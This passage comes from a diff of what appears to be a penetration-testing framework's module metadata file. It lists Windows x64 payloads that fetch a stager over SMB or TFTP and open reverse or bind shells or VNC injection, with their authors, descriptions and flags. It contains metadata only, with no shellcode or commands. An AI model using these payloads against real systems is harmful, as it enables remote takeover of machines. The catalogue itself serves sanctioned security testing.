"cmd/windows/smb/x64/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/shell/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/smb/x64/shell/reverse_tcp_rc4": { + "name": "SMB Fetch, Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/smb/x64/shell/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/shell/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/shell/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/smb/x64/shell/reverse_tcp_uuid": { + "name": "SMB Fetch, Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/smb/x64/shell/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/shell/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/shell/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/smb/x64/shell_bind_tcp": { + "name": "SMB Fetch, Windows x64 Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/windows/smb/x64/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection and spawn a command shell (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/shell_bind_tcp", + "staged": false + }, + "payload_cmd/windows/smb/x64/shell_reverse_tcp": { + "name": "SMB Fetch, Windows x64 Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/windows/smb/x64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn a command shell (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/smb/x64/vncinject/bind_ipv6_tcp": { + "name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/smb/x64/vncinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/vncinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/smb/x64/vncinject/bind_ipv6_tcp_uuid": { + "name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/smb/x64/vncinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/vncinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/smb/x64/vncinject/bind_named_pipe": { + "name": "SMB Fetch, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/smb/x64/vncinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/vncinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/vncinject/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/smb/x64/vncinject/bind_tcp": { + "name": "SMB Fetch, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/smb/x64/vncinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/vncinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/vncinject/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/smb/x64/vncinject/bind_tcp_rc4": { + "name": "SMB Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/smb/x64/vncinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/vncinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/vncinject/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/smb/x64/vncinject/bind_tcp_uuid": { + "name": "SMB Fetch, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/smb/x64/vncinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/vncinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/vncinject/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/smb/x64/vncinject/reverse_http": { + "name": "SMB Fetch, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/vncinject/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/vncinject/reverse_http", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_cmd/windows/smb/x64/vncinject/reverse_https": { + "name": "SMB Fetch, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "agix", + "rwincey" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/vncinject/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/vncinject/reverse_https", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_https" + }, + "payload_cmd/windows/smb/x64/vncinject/reverse_tcp": { + "name": "SMB Fetch, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/vncinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/vncinject/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/smb/x64/vncinject/reverse_tcp_rc4": { + "name": "SMB Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/vncinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/vncinject/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/smb/x64/vncinject/reverse_tcp_uuid": { + "name": "SMB Fetch, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/vncinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/vncinject/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/smb/x64/vncinject/reverse_winhttp": { + "name": "SMB Fetch, Windows x64 Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/vncinject/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/vncinject/reverse_winhttp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_cmd/windows/smb/x64/vncinject/reverse_winhttps": { + "name": "SMB Fetch, Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-07 15:59:31 +0000", + "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/smb/x64/vncinject/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/smb/x64", + "adapted_refname": "windows/x64/vncinject/reverse_winhttps", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "payload_cmd/windows/tftp/x64/custom/bind_ipv6_tcp": { + "name": "TFTP Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/tftp/x64/custom/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/custom/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/custom/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/tftp/x64/custom/bind_ipv6_tcp_uuid": { + "name": "TFTP Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/tftp/x64/custom/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/custom/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/custom/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/tftp/x64/custom/bind_named_pipe": { + "name": "TFTP Fetch, Windows shellcode stage, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/tftp/x64/custom/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/custom/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/custom/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/tftp/x64/custom/bind_tcp": { + "name": "TFTP Fetch, Windows shellcode stage, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/tftp/x64/custom/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nListen for a connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/custom/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/custom/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/tftp/x64/custom/bind_tcp_rc4": { + "name": "TFTP Fetch, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/tftp/x64/custom/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/custom/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/custom/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/tftp/x64/custom/bind_tcp_uuid": { + "name": "TFTP Fetch, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/tftp/x64/custom/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/custom/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/custom/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/tftp/x64/custom/reverse_http": { + "name": "TFTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/tftp/x64/custom/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/custom/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/custom/reverse_http", + "staged": true, + "stage_refname": "windows/x64/custom", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_cmd/windows/tftp/x64/custom/reverse_https": { + "name": "TFTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/tftp/x64/custom/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan 